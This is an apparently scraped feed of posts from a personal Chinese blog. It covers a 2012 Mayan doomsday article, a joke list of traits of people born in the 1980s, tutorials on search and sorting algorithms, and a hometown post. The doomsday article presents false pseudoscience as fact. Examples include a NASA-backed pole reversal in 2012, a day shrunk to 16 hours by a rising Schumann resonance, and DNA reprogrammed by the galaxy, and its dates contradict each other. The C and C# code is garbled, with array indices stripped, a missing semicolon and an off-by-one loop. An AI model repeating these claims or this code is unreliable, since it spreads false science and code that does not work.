根据玛雅人的长历法 (Long Count Calendar),2012年12月21日将是本次人类文明结束的日子。此后,人类将进入与本次文明毫无关系的一个全新的文明。玛雅人没有提到什麼原因使本次文明终结。有一点看来很明确,这个终结日并不意味著什麼大劫难的到来,而是在暗示一种全人类在精神和意识方面的觉醒和转变 (Cosmic Awareness and Spiritual Transition),从而进入新的文明。
玛雅人不拥有我们现代的科学技术,但他们对天文及数学的精通令人叹为观止。此外,还有很多令人猜不透的迷。他们有发达的道路系统但却不使用轮子,这样,他们也就不需要役使牛马。但他们是知道轮子的,因为后人发现了他们用轮子给孩子做的玩具。他们信手就可以把月亮背面的图像刻在月亮神庙的门上当作装饰,让我们的科学家一开始捉摸不透,等科学家证实了这是月亮背面图像时又百思不解:他们怎麼能看到的?因为月亮永远只把一面向著地球。这也许是因为他们的宇宙意识曾赋予他们特殊的智慧,玛雅人曾有他们自己的修炼体系。玛雅人在他们文明的鼎盛之际不留痕迹地遁去,使后人费尽心机也猜不出其中的原因
2012年的巧合:
首先看看美国NASA说的(很权威的,不是乱说):7年后太阳可能有异常。
1.地球与太阳的磁极将于2012年发生颠倒
天体和物理学家与电脑科学家共同研究发现,上次发生同等现象的时间是在恐龙消失时。在现代人类历史中,还没有此类现象发生时的场景记载。
北极与南极磁场发生颠倒的过程即为磁极颠倒。这一现象导致的最坏结果,将让地球磁场的磁力为零高斯(高斯为磁感应单位),如果此时再遇上周期为11年的太阳两极磁场颠倒,地球上所有动物(包括人类)的免疫系统将大为降低;地球的外壳会发生更多的火山喷发,地震,泥石流等现象;地球磁气圈将被减弱,来自太阳的宇宙辐射就会增大,最终可能对人类造成辐射灾难;一些小行星将朝地球方向飞来;地球的重力也会发生变化。
研究结果最后认为,如果所有的零磁力推测都同时发生,那么,只有居住在地球外壳深部地带的有机体能够不受影响。届时,人类躲避灾难的方法就是躲到地壳以下,或者搬去其它星球上居住。也许火星会是一个合适的选择。
但美国宇航局发表声明说,磁力为零只是最坏的可能而已,并不一定会发生。
2.厄尔尼诺
2011年是很特殊的一年,共发生4次日食。其中1月4日、6月1日和11月25日的日食发生在极区,7月1日的日食发生在高纬地区,有利于诱发厄尔尼诺。2012年发生2次日食,5月20日发生在高纬地区,11月13日发生在中纬地区。
根据日食-厄尔尼诺系数理论,计算出2011年日食-厄尔尼诺系数为10.5,2012年日食-厄尔尼诺系数为13。
可以对比的是,1997年日食-厄尔尼诺系数为12,但在那一年,却发生了20世纪最强的厄尔尼诺事件。
南京大学教授林振山等人预测,2011年会发生厄尔尼诺事件。
自然界的巧合,使厄尔尼诺事件与磁力危机,在2012年共同威胁地球上的生命
3.古文明预言
2012年12月31日是玛雅人长历法(Long Count Calendar)中本次人类文明结束的日子。此后,人类将进入与本次文明毫无关系的一个全新的文明。
究竟2012年会发生什么事呢?
不过我非常相信,自然灾难永远不会是毁灭人类的元凶
-
关于2012年12月的一些材料整理
1. 水晶头骨之迷中讲到2012年12月21日太阳下山之后,世界变化,只有非洲和中国西部地区部分人存活
-
2.科学预测2012年地球磁极颠倒,前几次分别导致了冰川时代和大洪水等事件
3.俄罗斯人预测2009年世界大战爆发,核危机
原子弹爆发
4.{被屏蔽内容}一个学龄前班的孩子突然说起古maya语,大概意思是说要净化地球, 时间是2012年
5.藏僧预言:2012年全球爆发核战神将显现干预
6.2012年,太阳磁极也会颠倒
7.星相上,2012年将出现大十字,土木相冲,日月相冲,这代表流血和死亡,上次十字发生在伊拉克战争
8.黄櫱禅师预测2012年{被屏蔽内容}回归
9.中国的推背图指2012年有难
推背图,是中国预言中最为著名的奇书之一
10.星相上,2012年5月 5日从双鱼时代正式过度为水瓶时代,双鱼时代的特征是工业和科学技术发展,水瓶时代的特征是精神领域的提升
11.协波汇聚是说:在某个时间,成千上万的新时代人在世界各地的灵性地点(中心)聚会,引导和平降临地球、祈愿所有生命合一、冥想新时代来临。协波汇聚的重要日期是1987年12月31日,以及 2012年的一个顶峰.
12.Amorah Quan Yin通灵预测洪水、地震、大陆板块移动、火山喷发、以及最终的两极变换,将会在2013年之前发生
13.:《圣经密码》指出,彗星将在那一年撞击地球;玛雅年历的注解显示宇宙末日将发生在2012年的12月21日
不论中国及欧美国家都出现过末日预言,然而在地球另一个角落,居住在中美的玛雅人,也在本身的历法出现末世预言,并说在二○一二年是世界末日,大家又会相信吗?
末日在本世纪
在历史上出现不少预言家,并着作不少预言书籍,其中著名的法国诺查丹玛斯的《诸世纪》曾经轰动一时,极受人们的重视,过去不少人都说书中所说的预言,在历史上一一应验,并且预言九九年是世界末日,当然没有被他不幸言中,於是坊间所有预言书的重视程度,立即下降。
唯独是西方的《圣经》,以及受中国的《推背图》,仍受到部分人的重视,《圣经》的「启示录」和《推背图》的第六十个卦象,都分别预言世界末日,但并没有末日的时间,可是在美洲的玛雅人,亦对世界末日作出了预言,在历法上注明了世界末日的时间表,地球会在二○一二年毁灭。
最后一次浩劫
依照玛雅历法,地球由始到终分为五个太阳纪,分别代表五次浩劫,其中四个浩劫已经过去,第一个太阳纪是洪水浩劫,世界遭到大洪水的浩劫,有人认为是圣经所说的诺亚方舟;第二个太阳纪是风蛇浩劫,世上的建筑物被风蛇吹毁。
第三个太阳纪是火雨浩劫,大地遭受天降火雨之祸;第四个太阳纪是地震浩劫,地球遭受强烈地震的灾祸,第五个太阳纪是世界末日,当第五个太阳纪来临,太阳会消失,大地剧烈摇晃,灾难四起,地球会彻底毁灭,按照马雅历法是三一一三年,换算为西历便是二○一二年十二月二十二日。
历法异常准确
虽然很多民族都有末日预言,但为何玛雅人所说的末日预言,会受到人们的重视,原因是玛雅历法的计算,非常准确,从玛雅人的历法得知,他们早已知道地球公转时间,是三百六十五日又六小时又二十四分二十秒,误差非常之少。另外对於其他星体的运行时间,在计算上亦非常准确,对於数学上「○」的单位数字,早在三千年前,玛雅人已经使用,科学家不由得不对玛雅的文化,感到惊讶,尤其是部分预言,都确信玛雅人所说的末日时间,必定会在本世纪来临。
究竟玛雅历法所说的世界末日,是否在本世纪来临,并说地球已遭受四次浩劫,本世纪将是最后一次,人类会彻底灭亡,可信程度又有多少,玛雅人是否如以往的骗人预言,对世人作出危言耸听。虽然现时有不少预言家已经相信,但单凭历法的准确性便相信玛雅人的预言,未免过於武断。
地球磁场倒转与玛雅文明预言地球灭亡之日
斐声国际的作家、工程师兼业余科学家「摩利斯.科特罗(Maurice Cotterell)」精于玛雅古文明研究,他从许多古庙与碑石中发现了一组一再重复出现的密码:1,366,560。若将这个密码的单位视为「天」,则换算为年的话,为3,740年。玛雅族诞生于公元前3113年,到750年突然消失,其中间生存的年代接近3740这个年数。根据玛雅文献的记载,地球每隔3,740年就会被毁灭一次,而地球生命在过去已曾被毁灭四次;换言之,现代人类应已是地玩第五代子孙了。「摩利斯」将玛雅文化中的圣数 1,366,560与太阳磁场变化周期,这二个表面上毫不相干的事连接在一起。科学的计算显示太阳磁极每隔3,740年就会对调一次,而3,740年就会对调一次,而3,740年刚好是1,366,560天换算的年数。由于地球的磁场受到太阳磁场很大的牵制,当太阳磁极逆转时,「摩利斯」推论地球磁极也跟着对调,令地球磁南北两球互换。生物无法适应突然发生的重大气候变化,而集体死亡。长毛象咸信是热带地区的生物,但由于磁极的对调,使它们生存的地方变成天寒地冻的不毛之地,于是发生长毛象在西伯利亚、阿拉斯加集体死亡的事情。而考古学上的证据显示这二个地方原本属于热带气候的。地球灭亡之日古玛雅人早就已经将那个日子准确地算出来。在不少预言中,年代记载最完整的,算是《克奥第特兰年代记》。他说我们得知第五太阳纪于公元前 3113年。在经历玛雅大周期的5125年后,第五大阳纪迎向最终。与现在西历相对照的话,便可知「太阳纪」将于「某纪的某日」结束。这个终结日,就在公元2012年12月22日的前后。
美洲土著人世代流传着一个故事:祖先留下了十三个水晶头骨,当地球文明达到极致时,它们会重新出现,并揭示出人类过去和末来的秘密……
磁场出现大洞
丹麦行星科学中心一个研究小组近日详细分析了丹麦“阿斯泰兹”号人造卫
星收集的最新资料,在对比新旧数据后惊讶地发现,地球两极的磁场正以惊
人的速度变化着,南大西洋和北冰洋的磁场都出现了多个大洞。磁场本是由
于熔岩状的金属物围着地核对流后产生的,因此这些科学家认为,南大西洋
和北冰洋下方可能出现了此类巨型涡流,从而影响了其上空的磁场。由于巨
型涡流的力量足以逆转其他涡流的方向,因此极有可能令南北极就此开始大
翻转。
两极翻不翻有争论
关于地球两极大翻转的话题并不新鲜,英美科学家曾发现在过去的200年内,
地球的磁场正在急剧地衰弱,并预言在未来的1000年内,地球磁场可能会完
全消失,从而导致地球南北两极大翻转。英国地质学家亚兰.托马斯教授说:
“从前地球磁极大约每隔25万年翻转一次,自上一次磁极翻转以来,地球磁
极已有100万年没有翻转了,下次地球磁极翻转,也许用不了等多长时间。”
但对这一问题,科学家们有不同的看法:一部分人认为这是地球磁极即将出
现翻转的信号,另一部分人则认为这只是暂时的衰弱,几百年后地球磁场将
会重新转强。
磁极翻一翻人类有大难
地球磁极翻转造成的后果相当严重,首先一些低轨道的卫星将完全暴露在太
阳电磁风暴的吹打中,不用多久就会完全摧毁,人类高科技通信技术将会遭
遇毁灭性的瘫痪。此外,许多随季节变化而移居的候鸟或动物———从燕子
到羚羊,几万年来它们一直依赖先天性本能鉴别地球南北极,秋移春返,到
时它们的命运很难预测。
而对于人类来说,最大的灾难莫过于强烈的太阳辐射。平时,这些宇宙射线
全在太空中就被地球磁场给吞没了。然而地球两极翻转过程中一旦地球磁场
消失,这些太阳粒子风暴将会猛击地球大气层,对地球气候和人类命运产生
致命的影响。因此有科学家怀疑,地球磁极翻转正是古人类文明覆灭的原
因。
-
玛雅人的预测
1.人类和地球目前正在意识和感知上经历巨变或转换。
2.中美洲的玛雅文明过去曾是,目前还是时间-科学领域知识中最先进的。他们的主历法是本星球最精确的。它从未出错。他们总共有22本历法,涵盖了宇宙与太阳系的众多周期。其中一些还有待揭示。
3.玛雅第五世于1987年结束。第六世自2012年开启。所以目前我们正处于“两世之间”。该时期被称作“天启时期”或启示期。这意味着真相将被揭示。这也是我们通过“我们的人”个体和集体工作的时候。
4.玛雅第六世实际还是空白。这意味着现在由我们,以及众多同创者,一起来创造我们所想要的新世界和新文明。
5.玛雅人还说,到2012年:
-我们将超越目前已知的技术;
-我们将超越时间和金钱;
-我们将经过第四维度进入第五维度的世界;
-地球和太阳系将与宇宙中其他部分一起,进入银河同步;
-我们的DNA将由银河中心升级(或重编)(Hunab Ku))
“此星球上每个人都在变异。尽管某些人比其他人更意识到此点,但每个人都在如此。”——来自星外地球使团
6.2012年,我们太阳系之平面(?)将和我们的银河系一起升高。该周期花费了26000年来完成。Virgil Armstrong也说到,其他2个星系将于同时和我们升高。这是一起宇宙事件!
7.时间正在加速(或说塌缩)。千万年以来,地球的Schumann共振(Schumann Resonance)或脉冲(心跳)为每秒7.83周,军事上一直将其作为极其可靠的参考来使用。但自1980年以来,该共振逐渐提高,目前已经超过每秒12周!此意味着现在每天等同于不到16个小时,而不再是过去的24小时!另一个解释是——我们,或说意识,160亿年来,到此同样之路7次了。同样的创造历程被挤成20倍之紧。这就是为什么时间看起来如此之快了。不是时间,而是“创造者”自己变快了。(请看玛雅中心历法。)
8.在启示时期,或“两世之间”,很多人将体验个人变化。变化很多且花样繁多。这都是我们来此学习和体验的一部分。比如:要结束的关系,居住地的变化,工作变迁,态度或思考的转变等。
9.记住,任何时刻,我们都在作或大或小的决定。
10.如果我们负面考虑,我们就会吸引那些负面东西。如果我们正面考虑,我们就将吸引正面的人们和事件。所以,要小心你的想法,排除不必要的负面或审判性想法。
11.要小心,大部分的媒体信息由一小部分人控制。使用你的洞察力!寻找那些隐藏的意图!为何此信息呈现于你面前?他们真正的意图是什么?这是一起问题-反应-解决方案吗?
12.记住:几乎没有任何事是偶发的。生活在此是一个振奋的时代! ]]> http://370567136.qzone.qq.com/blog/1238855828#comment 142606848 Sat, 04 Apr 2009 14:37:08 GMT http://370567136.qzone.qq.com/blog/1238855828 <![CDATA[80后的100个特征。。]]> http://370567136.qzone.qq.com/blog/1221574708 1.打折卡比银行卡多
 银行卡的意义在于证明你赚钱,打折卡的意义在于证明你玩钱,我们的生活不要结果,只要玩。
2.不用皮革钱包,只用帆布钱包
皮革钱包就意味着很久才换一个,意味着颜色晦暗单一,意味着钱包比里面的钱还贵,意味着不能随着心情换用。
3.服装店老板会发短信告诉你新货信息
谁还去百货公司、Mall、大卖场买衣服?每个人必须有自己独特的服装取向自己所钟爱的服装小店。
4.长期喝一个品牌的饮料
百事可乐、可口可乐、碧悠酸奶、午后红茶、胡萝卜汁,什么都好,选准一个 ,一直喝下去,直到看见这款饮料就想起你。
5.有一辆很少骑但很贵的单车
小轮、可折叠,Hasan、Airwalk或者大衡都行,只用于在办公室里骑,最多晚饭后在街道上骑500米去买蛋糕。
6.至少拥有一个双肩背包
不装东西,只为了背着。
7.为接到正装出席的请柬而苦恼
没有西装,即使有,也往往只挂在衣柜里占地方,最正的衣服是长袖T shirt。
8.可以没有电视机,但一定要有微波炉
电视基本不看,但微波炉除了解决吃的问题,还有神奇用途:冬天洗热水脸, 湿毛巾“叮”一分钟,搞定。
9.如果戴眼镜,一定是扁平黑框的
早就不是金丝眼镜的天下了。黑胶框眼镜不仅可以是近视,也可以是平光,甚至没有镜片只戴框。
10.永远对自己的发型不满意
发型不是身份,不是装饰,是娱乐。娱乐,就没有够,不满意就改,改了还是不满意。
11.对日.本菜,要么非常喜欢,要么非常讨厌
喜欢和讨厌都可以出自同一个理由:清淡、漂亮、仪式感、哈.日;或者没有理由,就是喜欢,就是讨厌,没有中间派。
12.在任何表面上都可以睡着,除了床
地铁和电影院容易睡着,头号大傻瓜和办公桌经常睡着,开会和写报告肯定睡着,但上床之后总会跳起来打游戏、看碟。
13.所有电器都不看说明书
写说明书的人都是白痴,看说明书的人比写说明书的人更白痴。
14.生日礼物一定有安.全套
性不是性,是娱乐,是玩笑,是揶揄。收到安全.套,却并不急不可耐地用出去.
15.不喝红酒
除了味道酸,还有气质酸,所以我们不选红酒,宁肯喝伏特加,红星小二也是不错的选择。
16.去24小时便利店的时候比超级市场多
我们经常晚上出来买东西,超级市场在哪里?
17.经常骂宜家,经常去宜家
宜家有太多理由让我们不爽,但那里东西的颜色和形状总是深得我心。
18.尽量使用自助办理业务
不想排队,不想被人叫号,不想浪费时间,不想隔着玻璃扯嗓子说话,不想看人的嘴脸。
19.饿了就吃,饿了才吃
吃饭是为了活着,活着不是为了吃饭,不管饿不饿都准点吃饭是可耻的,基本上只有下午茶是准时的。
20.使用最多的称呼是同学
称呼断层的一代,只有同学才能有效地拉近陌生人的距离,进可攻退可守。
21.路过有镜面反射的地方一定会关注一下自己的容貌
容貌不仅仅给别人看的,也要让自己愉悦,注意,这不是自恋,这是素质。
22.至少两周才打扫一次卫生
让环境卫生积累到足够创造一次成就感的时候才打扫,别让乐趣变成琐事。
23.喜欢玩小孩但不喜欢生小孩
想想自己是怎么长大的,想想自己还没有长大,就知道自己负不起那个责任。
24.不屑时尚杂志,只看潮流杂志
你们看ELLE、VOGUE去吧,我们看Milk、1626、Coldtea。
25.永远不知道自己的钱花到哪儿去了
  其实没买什么、其实没吃什么,但钱就是不见了。
26.可能有两个手机,但没有一个座机
座机有什么用?不要告诉我你拨号上网。
27.关我鸟事
谁能告诉我王菲生小孩的照片为什么可以卖到5万块一张?
28.只去药店,不去医院
我的身体我知道,去医院太麻烦。
29.最恨被人夸奖成熟
  你把谁当小孩呢?
30.痛恨人际关系
最好大家都在家工作,去办公室只是为了打乒乓球、打游戏机、聊八卦和约饭局。
31.不喜欢西藏、丽江,但喜欢香港
  别玩什么情调,假装自己很诗意,别来辞职、自省、皈依那一套。
32.早晨从中午开始
  我们的生活很有规律,只不过和你们时差几小时而已。
33.不喜欢喝酒,但每喝必醉
不然喝酒干嘛?补充体液?
34.不敬酒,不敬烟
爱喝就喝,想抽就拿,别搞得大义凛然的。
35.拥有一种奇怪的固执
不吃有脸的东西,只穿白袜子,不带瓶装矿泉水不出门,看着鱼缸就发呆,总有一样让你莫名其妙地坚持下去。
36.熟人面前是话痨,生人面前一言不发
  不是不爱说话,而是跟你没什么话可讲。
37.经常故意使用方言
  就是好玩。当X L行顺序依次为陕西话、天津话、上海话、东北话。
38.不洗脚,只洗澡
每天洗两次以上澡还用洗脚吗?
39.每天都有理由开派对,除了结婚
派对是为了玩,但结婚不好玩,所以尽量不要婚礼,绝不要春晚式的婚礼。
40.认为幽默感是做人的根本
至少也要会讲冷笑话吧。
41.为了不熬夜,不如就通宵
要么今早早点睡,要么今晚早点睡,既然已经熬了,就干脆熬通。
42.五一、十一绝不出游
与其人挤人,不如在家看碟。
43.业余爱好中必有一项是睡觉
我们不困,我们就是想睡。
44.喜欢看选秀,喜欢参加选秀
总觉得很多人都没有自己秀得好。
45.出游永远不给自己拍照
宁肯拍老乡家的狗,宁肯拍人家阳台上晾的衣服,宁肯拍自己在地上的影子。
46.常常玩消失
有可能是手机坏了,有可能是起床晚了,有可能只是想看看你们有什么反应。
47.经常发呆
因为脑子里有太多想法了,有时候都不知道自己在想什么。
48.随便
觉得什么都可以,什么都还行,只要方便简单,哪儿有那么多时间去浪费?
49.坚持认为自己不懂爱情
随时可以爱,喜欢很多人,会为人哭,但不会为人去死。

50.英语的听说能力大大强于读写能力
声称自己英语很差,不过基本都能听懂英语电影对白。
51.认为世界就是由破事组成的
觉得自己已经看透了,没什么大不了的,社会就是那么回事。
52.越吊的人就越不吊他
这世界离了谁就不转了啊,谁都别把自己当回事。
53.鄙视娱乐报纸,但要上娱乐网站
有朴素的道德观,有朴素的窥私欲。
54.找异性同事陪伴去买内衣
内衣不是隐私,陪异性买内衣不是性.骚扰,是乐趣。
55. 对人的最坏评价是闷
闷是一种抽象标准,话痨也会闷,关键看话有没有营养。
56.对人的最好评价是闷骚
压抑与释放的完美结合,没比这更好了。
57.经常觉得自己老了
新血总是一夜长大,而自己还没确定要做什么。
58.两分钟通常这样安排:前一分钟是崇拜,后一分钟变成藐视,或者相反
永远没有固定的标准,偶像可以因为一句话立刻变成呕像。
59.永远觉得别人不可能了解自己
一个人的世界观,独生子女的人际网,小心翼翼的孤独和自我保护。
60.不和30岁以上的人做朋友,但可以做恋人
完全无法和老年人沟通,却容易被老年人的成熟阅历、博大知识而击溃。
61.喜欢酷的女生,或者漂亮的男生
女生装处和男生装酷不仅不时尚,而且是智力有问题。
62.喜欢八卦别人,但对别人的任何取向都不惊讶
八卦是娱乐,又不是战争,谁都有自己的小乐趣。
63.写博,但绝不呕心沥血
写博写成论文,还不如下来写论文,博客不好玩不如去死。
64.不看500字以上的帖子
现在已经不是逻辑的天下,对此,我们只能飘过。
65.网友成为朋友,朋友成为网友
因为意气相投而成为朋友,因为兴趣渐少而只能发表情符号,还用得着讨论网络的利弊吗。
66.MSN名字一天至少换一次
只用真名做MSN名字开头的人,显然不了解心情变化的乐趣。
67.不问问题,只查Google
给我一分钟,我就和你知道的一样多。
68.熟知每家K房的歌曲
关键是日.韩歌曲、港台新歌在城市中的分布地图。
69.发花痴
不惮于用最猛烈的言行来表达对某人的热爱。
70.不知道什么电子游戏自己不知道
从8位机一直玩到PS2,真的不知道自己的盲区在哪儿。
71.每个都是电影迷
买很多碟,看很多场电影,挑很多电影的很多Bug。
72.喜欢玩问答游戏
喜欢什么?害怕什么?最近听什么歌?最崇拜谁?择偶标准?不仅为了给别人看,也为了给自己看。

73.会画画、喜欢画画或者想学画画
幻想成为矢泽爱和高木直子的混合体。
74.有一款喜欢的卡通形象
青蛙军曹Keroro、暴.力熊Gloomy、熊猫SAM,实在不行就去搜集各种漫画的手办,但千万别是史努比。
75.可以借书,绝不借碟
76.喜欢看广告
心目中都有自己的最爱广告榜、傻.逼广告榜,会为了看漂亮广告放弃电视剧。
77.热衷于研究星座运势
要有生日,就可以说出性格、运势、般配,热恋、失恋时对此深信不疑。
78.至少有一个曾经是偶像而现在羞于承认的明星
觉得自己的梦中情人现在变得很傻帽。
79.以追看低智的影视作品为乐
好片子总是无话可说,烂片子才是娱乐源泉,任何东西都是Kuso的对象。
80.R&R、R&B、Hip-Hop,至少喜欢一个
不管有没有搞清楚它们的区别,但周杰伦和五月天总还是不错的。
81.单位和住处距离在步行15分钟以内
人生短暂,干吗不把路上消耗的时间用来睡觉、化妆、发呆?
82.要么打车,要么走路,绝不坐公车
坐公车完全是生存竞赛,没必要这样消耗生命。
83.用箱子装书,而不是书架
想看的时候自然可以翻出来,被人夸有文化觉得是被嘲笑。
84.可以拼出每个字,但不见得能写出来
要么是因为电脑用多了忘了,要么是因为字写得很难看而不愿写。
85.可以穿短裤上班
要求制服上班的单位绝对不去,工作已经很无聊了,不想秀衣服这样唯一的乐趣都丧失掉。
86. 不停地买笔记本
从来不在上面写字,就是为了好看的封面和纸张而收集。
87. 鄙视办公室恋情
天天面对、同进同出非常可怕,除了证明己人际圈的狭窄没有任何意义。
88. 任何工作都和电脑有关
体力劳动不是我们的强项,何况20%的工作时间还要用于玩游戏和聊天。
89. 永远找不到自己的笔
总是随手抓别人的笔用,每支笔都长得像自己的笔,不管有多少支笔都会消
失。
90.拥有一个以上的MP3
已经无聊到随时随地需要音乐的程度了。
91.不买iPod
因为太大,因为花色太少,因为人人都有。
92.用动感地带
因为有套餐,不管有没有省钱;因为可以网上办理业务,不管有没有登陆过。
93.很少打电话,经常发短信 不想用声音沟通,只想用文字沟通,哪怕会耗费更多的时间和金钱。
94.键盘都磨损得很快,无论手机还是电脑 要么不停地敲、要么不停地按,这是我们的表达方式、娱乐方式、生活方式。
95.手机是用来自拍的 喜欢各个场景、各个色调、各个角度、各个部位的自己,即使被人看到手机里存的隐秘照片也不以为忤,反而心中暗喜。
96.电脑里一定有聊天工具 不联网的电脑是可耻的,开电脑一定先登陆聊天工具。
97.不买品牌电脑 因为我们随时需要自己增添内存条、换显卡硬盘,也不想暴露自己是电脑盲。
98.喜欢给电子产品搭配外设 产品本身并不值得骄傲,所搭配的外设才是自己的烙印。
99.彩铃两周一换 随时提醒别人,自己心情的起伏、口味在发生转移、又发现了新玩意,我有什么变化你有义务知道。
100.我就喜欢 我就喜欢,你管得着吗?

]]> http://370567136.qzone.qq.com/blog/1221574708#comment 8389120 Tue, 16 Sep 2008 14:18:28 GMT http://370567136.qzone.qq.com/blog/1221574708 <![CDATA[查找算法]]> http://370567136.qzone.qq.com/blog/1220011535
在进行查找时,主要是以要查找的数据与数据序列中的数据进行比较,如果数据不相等,则进行下一次的比较,一直找到相等的数据为止。

查找算法在实际运做过程中数据的存储方式不同,可分为“内部查找”与“外部查找”两类。

内部查找是如果待查找的数据可以全部加载到内存中在进行的查找;
外部查找是如果要查找的数据量太大,无法全部加载到内存中,必须借助辅助存储设备的空间再进行查找;

查找法可分为:线性查找法、二分查找法、插补查找法和散列查找法。
/*算法名称:线性查找法*/

int linear_search(int A[],int n,int key)
{
int i=0;
while(i<n-1)
{
if(A==key)
{
return i; //查找成功
}
else
i++;
}
return -1; //查找失败
}

/*算法名称:二分查找法*/

int binary_search(int *A,int key,int low,int upper)
{
int mid=0;
while(low<upper)
{
mid=(int)((low+upper)/2)
if(key==A[mid])
return mid; //查找成功
else if(key>A[mid])
low=mid+1;
else
upper=mid-1;
}
return -1; //查找失败
} ]]> http://370567136.qzone.qq.com/blog/1220011535#comment 8389120 Fri, 29 Aug 2008 12:05:35 GMT http://370567136.qzone.qq.com/blog/1220011535 <![CDATA[C#排序算法大全]]> http://370567136.qzone.qq.com/blog/1220011395

一、冒泡排序(Bubble)

using System;

namespace BubbleSorter
{
public class BubbleSorter
{
public void Sort(int[] list)
{
int i,j,temp;
bool done=false;
j=1;
while((j<list.Length)&&(!done))
{
done=true;
for(i=0;i<list.Length-j;i++)
{
if(list>list)
{
done=false;
temp=list;
list=list;
list=temp;
}
}
j++;
}
}
}

public class MainClass
{
public static void Main()
{
int[] iArrary=new int[]{1,5,13,6,10,55,99,2,87,12,34,75,33,47};
BubbleSorter sh=new BubbleSorter();
sh.Sort(iArrary);
for(int m=0;m<iArrary.Length;m++)
Console.Write("{0} ",iArrary[m]);
Console.WriteLine();
}
}
}

二、选择排序(Selection)

using System;

namespace SelectionSorter
{
public class SelectionSorter
{
private int min;
public void Sort(int [] list)
{
for(int i=0;i<list.Length-1;i++)
{
min=i;
for(int j=i+1;j<list.Length;j++)
{
if(list[j]<list[min])
min=j;
}
int t=list[min];
list[min]=list;
list=t;
}
}
}

public class MainClass
{
public static void Main()
{
int[] iArrary = new int[]{1,5,3,6,10,55,9,2,87,12,34,75,33,47};
SelectionSorter ss=new SelectionSorter();
ss.Sort(iArrary);
for (int m=0;m<iArrary.Length;m++)
Console.Write("{0} ",iArrary[m]);
Console.WriteLine();
}
}
}

三、插入排序(InsertionSorter)

using System;

namespace InsertionSorter
{
public class InsertionSorter
{
public void Sort(int [] list)
{
for(int i=1;i<list.Length;i++)
{
int t=list;
int j=i;
while((j>0)&&(list[j-1]>t))
{
list[j]=list[j-1];
--j;
}
list[j]=t;
}
}
}

public class MainClass
{
public static void Main()
{
int[] iArrary=new int[]{1,13,3,6,10,55,98,2,87,12,34,75,33,47};
InsertionSorter ii=new InsertionSorter();
ii.Sort(iArrary);
for(int m=0;m<iArrary.Length;m++)
Console.Write("{0}",iArrary[m]);
Console.WriteLine();
}
}
}

四、希尔排序(ShellSorter)

using System;

namespace ShellSorter
{
public class ShellSorter
{
public void Sort(int [] list)
{
int inc;
for(inc=1;inc<=list.Length/9;inc=3*inc+1);
for(;inc>0;inc/=3)
{
for(int i=inc+1;i<=list.Length;i+=inc)
{
int t=list;
int j=i;
while((j>inc)&&(list[j-inc-1]>t))
{
list[j-1]=list[j-inc-1];
j-=inc;
}
list[j-1]=t;
}
}
}
}

public class MainClass
{
public static void Main()
{
int[] iArrary=new int[]{1,5,13,6,10,55,99,2,87,12,34,75,33,47};
ShellSorter sh=new ShellSorter();
sh.Sort(iArrary);
for(int m=0;m<iArrary.Length;m++)
Console.Write("{0} ",iArrary[m]);
Console.WriteLine();
}
}
}

]]> http://370567136.qzone.qq.com/blog/1220011395#comment 8389120 Fri, 29 Aug 2008 12:03:15 GMT http://370567136.qzone.qq.com/blog/1220011395 <![CDATA[[转]临沂 我的家]]> http://370567136.qzone.qq.com/blog/1219914117



看到最熟悉不过的那些角落的时候
心里还是微微的颤了一下
临沂
我付出了最多的感情的地方
想要迅速逃离
可又割舍不下的地方

朋友们可以转载,为我们的家乡多多做宣传 ]]> http://370567136.qzone.qq.com/blog/1219914117#comment 4104 Thu, 28 Aug 2008 09:01:57 GMT http://370567136.qzone.qq.com/blog/1219914117